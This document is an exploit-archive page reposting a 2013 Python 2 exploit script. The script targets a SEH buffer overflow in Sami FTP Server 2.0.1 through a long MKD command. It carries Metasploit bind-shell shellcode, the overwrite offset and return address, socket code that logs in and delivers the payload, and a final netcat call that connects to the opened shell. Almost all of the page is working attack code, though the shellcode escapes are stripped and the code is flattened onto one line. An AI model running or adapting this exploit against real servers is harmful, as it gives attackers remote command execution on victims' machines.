Home / exploits Sami FTP 2.0.1 MKD Buffer Overflow
Posted on 13 August 2013
#!/usr/bin/python # Exploit Title: Sami FTP MKD buffer overflow (SEH) + Bypass ASL # Date: 11 Agosto 2013 # Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org # Vendor Homepage: http://www.karjasoft.com/old.php # Version: Sami FTP Server 2.0.1 # Tested on: Windows 7 Home Basic x86, Spanish # Thanks:To my wife for putting up with my possessions # # Description: # A buffer overflow is triggered when a long MKD command is sent to the server and the user views the Log tab. import socket, sys, os, time if len(sys.argv) != 3: print "[*] Uso: %s <Ip Victima> <Puerto> " % sys.argv[0] print "[*] Exploit created by Polunchis" print "[*] https://www.intrusionlabs.org" sys.exit(0) target = sys.argv[1] port = int(sys.argv[2]) #msfpayload windows/shell_bind_tcp LPORT=28876 R | msfencode -a x86 -b 'x00xffx0ax0dx20x40' -t c shellcode = ( "xdaxcfxb8xbaxb3x1exe7xd9x74x24xf4x5ax33xc9xb1" "x56x31x42x18x83xc2x04x03x42xaex51xebx1bx26x1c" "x14xe4xb6x7fx9cx01x87xadxfax42xb5x61x88x07x35" "x09xdcxb3xcex7fxc9xb4x67x35x2fxfax78xfbxefx50" "xbax9dx93xaaxeex7dxadx64xe3x7cxeax99x0bx2cxa3" "xd6xb9xc1xc0xabx01xe3x06xa0x39x9bx23x77xcdx11" "x2dxa8x7dx2dx65x50xf6x69x56x61xdbx69xaax28x50" "x59x58xabxb0x93xa1x9dxfcx78x9cx11xf1x81xd8x96" "xe9xf7x12xe5x94x0fxe1x97x42x85xf4x30x01x3dxdd" "xc1xc6xd8x96xcexa3xafxf1xd2x32x63x8axefxbfx82" "x5dx66xfbxa0x79x22x58xc8xd8x8ex0fxf5x3bx76xf0" "x53x37x95xe5xe2x1axf2xcaxd8xa4x02x44x6axd6x30" "xcbxc0x70x79x84xcex87x7exbfxb7x18x81x3fxc8x31" "x46x6bx98x29x6fx13x73xaax90xc6xd4xfax3exb8x94" "xaaxfex68x7dxa1xf0x57x9dxcaxdaxeex99x04x3exa3" "x4dx65xc0x33x42xe0x26xd9x4axa5xf1x75xa9x92xc9" "xe2xd2xf0x65xbbx44x4cx60x7bx6ax4dxa6x28xc7xe5" "x21xbax0bx32x53xbdx01x12x1ax86xc2xe8x72x45x72" "xecx5ex3dx17x7fx05xbdx5ex9cx92xeax37x52xebx7e" "xaaxcdx45x9cx37x8bxaex24xecx68x30xa5x61xd4x16" "xb5xbfxd5x12xe1x6fx80xccx5fxd6x7axbfx09x80xd1" "x69xddx55x1axaax9bx59x77x5cx43xebx2ex19x7cxc4" "xa6xadx05x38x57x51xdcxf8x67x18x7cxa8xefxc5x15" "xe8x6dxf6xc0x2fx88x75xe0xcfx6fx65x81xcax34x21" "x7axa7x25xc4x7cx14x45xcd" ) # SEH overwritten at offset 468 # poppop et ESP at C:Program FilesPMSystemTemp mp0.dll (Universal) # pop/pop/ret 10022689 jmpshort = 'xebx06x90x90' nexseh= 'x89x26x02x10' garbage= 'x41' * 468 fixstack= 'x81xc4x48xf4xffxff' buffer = garbage + jmpshort + nexseh + fixstack + shellcode s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Connect to %s on port %d" % (target,port) try: s.connect((target,port)) s.recv(1024) s.send('USER polunchis ') s.recv(1024) s.send('PASS polunchis ') s.recv(1024) s.send("MKD " + buffer + " ") print "[+] Sending payload of size", len(buffer) print s.recv(1024) s.close() print "[+] Exploit Sent Successfully" print "[+] Waiting for 5 sec before spawning shell to " + target + ":28876 " print " " time.sleep(5) os.system ("nc -n " + target + " 28876") print "[-] Connection lost from " + target + ":28876 " except: print "[-] Could not connect to " + target + ":21 " sys.exit(0)
